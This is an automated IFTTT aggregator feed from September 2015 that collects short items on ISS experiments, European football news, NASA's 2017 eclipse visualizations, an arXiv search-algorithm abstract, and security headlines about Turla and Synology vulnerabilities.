hard‐scheduled session today.  Yesterday we focused on Cloud Turrets observation. The first hard‐scheduled session went well, and during the GMT251 ESA crew conference, Mogensen confirmed he acquired some CT’s targets. 160 Images are now under assessment by science team.  The THOR experiment will improve our understanding how lightning activity powers cloud turrets, gravity waves, and improve our understanding of the structure of Transient Luminous Events above thunderstorms. If confirmed technically feasible, the photography technique used will also add valuable scientific data to ESA’s future ASIM project mission. Improving our understanding of the processes occurring in Earth’s lower layers of the atmosphere can improve atmospheric models and our understanding of earth’s climate and weather.   MARES: This morning Mogensen set up the rack and its ankle mechanism assembly. A small anomaly was encountered regarding a screw that was not touching the thread anymore. This was resolved realtime. The ESA Muscle Atrophy Research and Exercise System (MARES) is a physiological research facility that will be used to carry out research on musculoskeletal, biomechanical, and neuromuscular human physiology. The Commissioning Part#2 is the last step in this research rack check‐out activities. Its main goal is the performance of an integrated man‐in‐the‐loop technical protocol which characterizes all MARES sub‐systems and associated auxiliary measurement devices (ultrasound, electrical muscle stimulation and electromyogram).   MELONDAU: yesterday DEMES tasting session#4 and DEMES hedonic questionnaire #2 were completed nominally.  Current status of MCA/AQM measurements: ‐ MCA measurements have been received by BIOTESC for GMT248 to GMT250, GMT251 files are pending. ‐ AQM: confirmed that we have no measurements for either GMT 248 or 249. For GMT250, some files were acquired with AQM in speed mode (rather than autorun mode). For GMT251, the same speed mode was used. All Files are pending from NASA still. Long‐distance and long‐term human space travel will only be possible with adequate life support systems in place, allowing extensive recycling of water and the in situ production of oxygen and food, with closed regenerative systems the most ideal way of reducing launch mass and costs. […]

from ISS On-Orbit Status Report http://ift.tt/1OflZNd
via IFTTT

FIFA adviser urges presidential term limits to force change

ZURICH (AP) FIFA adviser Domenico Scala says imposing term limits on presidents and top officials is needed to change soccer's governing body.

from FOX Sports Digital http://ift.tt/1OCyDnw
via IFTTT

Russian Hackers Hijack Satellite To Steal Data from Thousands of Hacked Computers

A group of Russian hackers, most notably the Turla APT (Advanced Persistent Threat) is hijacking commercial satellites to hide command-and-control operations, a security firm said today. Turla APT group, which was named after its notorious software Epic Turla, is abusing satellite-based Internet connections in order to: Siphon sensitive data from government, military, diplomatic, research


from The Hacker News http://ift.tt/1OfhyC4
via IFTTT

Bayern midfielder Javi Martinez eyeing return from injury

MUNICH (AP) Bayern Munich defensive midfielder Javi Martinez hopes to return soon from a serious left knee injury.

from FOX Sports Digital http://ift.tt/1gbtFSJ
via IFTTT

Balotelli set for 2nd Milan debut in derby at old club Inter

MILAN (AP) Mario Balotelli is expected to make his second AC Milan debut on Sunday, adding extra spice to what is already set to be a heated derby match against Inter Milan.

from FOX Sports Digital http://ift.tt/1FzhyFN
via IFTTT

Dortmund, Bayern aim to maintain perfect league starts

BERLIN (AP) The Bundesliga returns from the international break with Borussia Dortmund and Bayern Munich aiming to maintain their perfect starts to the season. Dortmund, which leads on goal difference after three games, visits Hannover on Saturday, while Bayern hosts Augsburg for a Bavarian derby.

from FOX Sports Digital http://ift.tt/1i0d4T2
via IFTTT

Aquarius Sea Surface Salinity 2011-2015

Aquarius is a collaboration between NASA and the Space Agency of Argentina to measure global sea surface salinity (the amount of dissolved salts in water). Measuring salinity can help us better understand the water cycle and can also lead to improved climate models. The visualizations show the complete observations of sea surface salinity taken during the life span (2011 through May 2015) of the Aquarius spacecraft. In these visualizations, sea surface salinity is shown ranging from 30 to 40 PSU (from blue to green to red) on a flat map using simple cartesian and extended Molleide projections. The visualizations were generated based on version 4.0 of the Aquarius data products.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1UDz3AV
via IFTTT

2017 Total Solar Eclipse in the U.S.

On Monday, August 21, 2017, the Moon will pass in front of the Sun, casting its shadow across all of North America. This will be the first total solar eclipse visible in the contiguous United States in 38 years. The Moon's shadow can be divided into areas called the umbra and the penumbra. Within the penumbra, the Sun is only partially blocked, and observers experience a partial eclipse. The much smaller umbra lies at the very center of the shadow cone, and anyone there sees the Moon entirely cover the Sun in a total solar eclipse. In the animation, the umbra is the small black oval. The red streak behind this oval is the path of totality. Anyone within this path will see a total eclipse when the umbra passes over them. The much larger shaded bullseye pattern represents the penumbra. Steps in the shading denote different percentages of Sun coverage, at levels of 90%, 75%, 50% and 25%. The yellow and orange contours map the path of the penumbra. The outermost yellow contour is the edge of the penumbra path. Outside this limit, no part of the Sun is covered by the Moon. The numbers in the lower left corner give the latitude and longitude of the center of the umbra as it moves eastward, along with the altitude of the Sun above the horizon at that point. Also shown is the duration of totality: for anyone standing at the center point, this is how long the total solar eclipse will last. Note that the duration varies from just 2 minutes on the West Coast to 2 minutes 40 seconds east of the Mississippi River. About Accuracy You might think that calculating the circumstances of an eclipse would be, if not easy, then at least precise. If you do the math correctly, you'd expect to get exactly the same answers as everyone else. But the universe is more subtle than that. The Earth is neither smooth nor perfectly spherical, nor does it rotate at a perfectly constant, predictable speed. The Moon isn't smooth, either, which means that the shadow it casts isn't a simple circle. And our knowledge of the size of the Sun is uncertain by a factor of about 0.2%, enough to affect the duration of totality by several seconds. Everyone who performs these calculations will make certain choices to simplify the math or to precisely define an imperfectly known number. The choices often depend on the goals and the computing resources of the calculator, and as you'd expect, the results will differ slightly. You can get quite good results with a relatively simple approach, but it sometimes takes an enormous effort to get only slightly better answers. The following table lists some of the constants and data used for this animation. Earth radius6378.137 kmEarth flattening1 / 298.257 (the WGS 84 ellipsoid)Moon radius1737.4 km (k = 0.2723993)Sun radius696,000 km (959.634 arcsec at 1 AU)EphemerisDE 421Earth orientationearth_070425_370426_predict.bpc (ΔT corrected)Delta UTC68.184 seconds (TT - TAI + 36 leap seconds) A number of sources explain Bessel's method of solar eclipse calculation, including chapter 9 of Astronomy on the Personal Computer by Oliver Montenbruck and Thomas Pflager and the eclipses chapter of The Explanatory Supplement to the Astronomical Almanac. The method was adapted to the routines available in NAIF's SPICE software library. The value for the radius of the Moon is slightly larger than the one used by Fred Espenak and slightly smaller than the one used by the Astronomical Almanac. The Sun radius is the one used most often, but see figure 1 in M. Emilio et al., Measuring the Solar Radius from Space during the 2003 and 2006 Mercury Transits for a sense of the uncertainty in this number. Both the elevations of locations on the Earth and the irregular limb of the Moon were ignored. The resulting small errors mostly affect the totality duration calculation, but they tend to cancel out—elevations above sea level slightly lengthen totality, while valleys along the lunar limb slightly shorten it. The effect on the rendered images is negligible (smaller than a pixel). Another minor complication that's ignored here is the difference between the Moon's center of mass (the position reported in the ephemeris) and its center of figure (the center of the disk as seen from Earth). These two centers don't exactly coincide because the Moon's mass isn't distributed evenly, but the difference is quite small, about 0.5 kilometers.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1OC6Aob
via IFTTT

2017 Eclipse Shadow Cones

A solar eclipse occurs when the Moon's shadow falls on the Earth. The shadow comprises two concentric cones called the umbra and the penumbra. Within the smaller, central umbra, the Sun is completely blocked by the Moon, and anyone inside the umbra sees a total eclipse. Within the larger penumbra, the Sun is only partially blocked. In this animation, the umbra and penumbra cones are viewed through a telescopic lens on a virtual camera located far behind the Moon. Long focal lengths like the one used here appear to compress the distance between near and far objects. Despite appearances, the geometry of the scene is correct. The Earth is roughly 112 lunar diameters beyond the Moon, and the angle at the apex of the umbral cone is only about half a degree. From this point of view directly behind the Moon, the edges of the shadow cones look circular. The edge of the penumbra is outlined in yellow. It passes over all of North and Central America and the Amazon basin, as well as Greenland and the North Pole. Everyone there will see at least a partial eclipse. The path of the umbra (the small black dot) crosses the United States from Oregon to South Carolina.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1UDz4ox
via IFTTT

2017 Eclipse and the Moon's Orbit

Solar eclipses can only occur at New Moon, when the Moon is between the Earth and the Sun. But not every New Moon produces an eclipse. The Moon's orbit is slightly tilted, and as seen in this animation, the tilt causes the Moon's shadow to miss the Earth during most New Moons—about five out of six, in fact. As the Earth-Moon system orbits the Sun throughout the year, the Moon's orbital tilt changes direction relative to the Sun. Sometimes the up side of the orbit is facing the Sun, and sometimes the down side. Twice a year, for about a month, what's facing the Sun is the line dividing the up and down sides. This is the line of nodes, the intersection of the Earth-Moon plane and the ecliptic or Earth-Sun plane. A solar eclipse can only occur at a New Moon that falls within one of these month-long eclipse seasons. That's when the Moon is close enough to the ecliptic to actually come between the Earth and the Sun. In this animation, the olive-colored square represents the ecliptic plane, while the light blue circle shows the plane of the Moon's orbit. The darker half of the lunar orbit plane is below (south of) the ecliptic, and the dividing line between light and dark is the line of nodes. The radial grid on the lunar orbit plane is stationary relative to the stars. It appears to rotate because our point of view is fixed to the Earth-Sun line; we're following the Earth as it orbits the Sun. At first glance, the line of nodes appears to be tracking with the grid, but in reality it's slowly turning westward (clockwise), completing a full revolution in 18.6 years. Unlike most illustrations of this kind, the Earth and the Moon are to scale. The Sun is off-screen to the left, about 400 times farther than the Earth-Moon distance and roughly twice as big as the Moon's orbit.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1OC6A7C
via IFTTT

Barcelona and Atletico to see how they measure up in Spain

MADRID (AP) Barcelona and Atletico Madrid get to test their strength in the first big match of the season in the Spanish league.

from FOX Sports Digital http://ift.tt/1VPqfVW
via IFTTT

Villas-Boas to quit as Zenit coach at end of season

MOSCOW (AP) Andre Villas-Boas says he will quit as Zenit St. Petersburg coach at the end of the season after he was blocked from leaving in the summer.

from FOX Sports Digital http://ift.tt/1ifnPBD
via IFTTT

Study: 800,000 tourists attended football games in England

LONDON (AP) The lure of British football is highlighted in a study which found that 800,000 international visitors to the country last year attended a match, spending more than $1 billion during their time there.

from FOX Sports Digital http://ift.tt/1UDgjBG
via IFTTT

NGC 1316: After Galaxies Collide


Astronomers turn detectives when trying to figure out the cause of startling sights like NGC 1316. Their investigation indicates that NGC 1316 is an enormous elliptical galaxy that started, about 100 million years ago, to devour a smaller spiral galaxy neighbor, NGC 1317, just above it. Supporting evidence includes the dark dust lanes characteristic of a spiral galaxy, and faint swirls and shells of stars and gas visible in this wide and deep image. One thing that remains unexplained is the unusually small globular star clusters, seen as faint dots on the image. Most elliptical galaxies have more and brighter globular clusters than NGC 1316. Yet the observed globulars are too old to have been created by the recent spiral collision. One hypothesis is that these globulars survive from an even earlier galaxy that was subsumed into NGC 1316. Another surprising attribute of NGC 1316, also known as Fornax A, is its giant lobes of gas that glow brightly in radio waves. via NASA http://ift.tt/1OxDOVv

Wednesday, September 9, 2015

Orioles Highlight: Steve Pearce hits go-ahead HR, Ubaldo Jimenez (7 IP, 3 ER) gets 11th win in 5-3 victory at Yankees (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

A Topological Approach to Meta-heuristics: Analytical Results on the BFS vs. DFS Algorithm Selection Problem. (arXiv:1509.02709v1 [cs.AI])

Search is a central problem in artificial intelligence, and BFS and DFS the two most fundamental ways to search. In this report we derive results for average BFS and DFS runtime: For tree search, we employ a probabilistic model of goal distribution; for graph search, the analysis depends on an additional statistic of path redundancy and average branching factor. As an application, we use the results on two concrete grammar problems. The runtime estimates can be used to select the faster out of BFS and DFS for a given problem, and may form the basis for further analysis of more advanced search methods. Finally, we verify our results experimentally; the analytical approximations come surprisingly close to empirical reality.



from cs.AI updates on arXiv.org http://ift.tt/1Q2axD2
via IFTTT

Ravens: WR Steve Smith is appealing the fine he received stemming from his ejection in preseason game vs. Redskins (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Multiple Cross-Site Scripting vulnerabilities in Synology Download Station

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Synology Video Station command injection and multiple SQL injection vulnerabilities

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Mexico TV uses Trump to heat soccer rivalry

MEXICO CITY (AP) One of Mexico's leading television networks is using the words of Republican presidential aspirant Donald Trump to bump up the already heated rivalry between the U.S. and Mexico men's national soccer teams.

from FOX Sports Digital http://ift.tt/1XLXQll
via IFTTT

Crowded contest for FIFA top job as Prince Ali makes 2nd bid

GENEVA (AP) FIFA presidential contender Prince Ali bin al-Hussein has launched his second bid for football's top office into a more crowded field.

from FOX Sports Digital http://ift.tt/1ix9XCy
via IFTTT

German football chief visits 'Refugees United'

BERLIN (AP) The help being given to migrants by German soccer clubs was praised by German football federation (DFB) president Wolfgang Niersbach on Wednesday as he visited migrants in the central state of Hesse.

from FOX Sports Digital http://ift.tt/1OzekHi
via IFTTT

Orioles: Rumblings of internal strife amid streak of 3 straight winning seasons being snapped, writes Jerry Crasnick (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Samsung Launches 6GB RAM Chips for Next Generation Smartphones

With Launch of Galaxy S6 and Galaxy S6 Edge, Samsung was the first one to bring 4GB RAM access in the Android mobile phones; with Samsung Note 5 and the current OnePlus 2 carrying the same RAM capacity. <!-- adsense --> Now, today Samsung has again taken the technology a step further with the launch of 12GB LPDDR4 (low power, double data rate 4) DRAM Chip that will offer 6GB RAM for the


from The Hacker News http://ift.tt/1L1I68K
via IFTTT

Prince Ali of Jordan announces bid for FIFA president

AMMAN, Jordan (AP) Prince Ali bin al-Hussein of Jordan is running for FIFA president, saying Wednesday he will fight ''deep-seated corruption and political deal-making'' and make soccer's scandal-scarred governing body more transparent.

from FOX Sports Digital http://ift.tt/1LXrrlr
via IFTTT

PSG to give 1 million euros to help tackle migrants crisis

PARIS (AP) Paris Saint-Germain will donate one million euros ($1.12 million) to the United Nations' refugee agency and a French non-profit association to help relieve the migrants crisis.

from FOX Sports Digital http://ift.tt/1NicNGV
via IFTTT

President of chess federation could run for FIFA president

MOSCOW (AP) An eccentric Russian politician who is the president of the World Chess Federation and claims to have visited an alien spaceship is thinking about running for FIFA president.

from FOX Sports Digital http://ift.tt/1XL7ULE
via IFTTT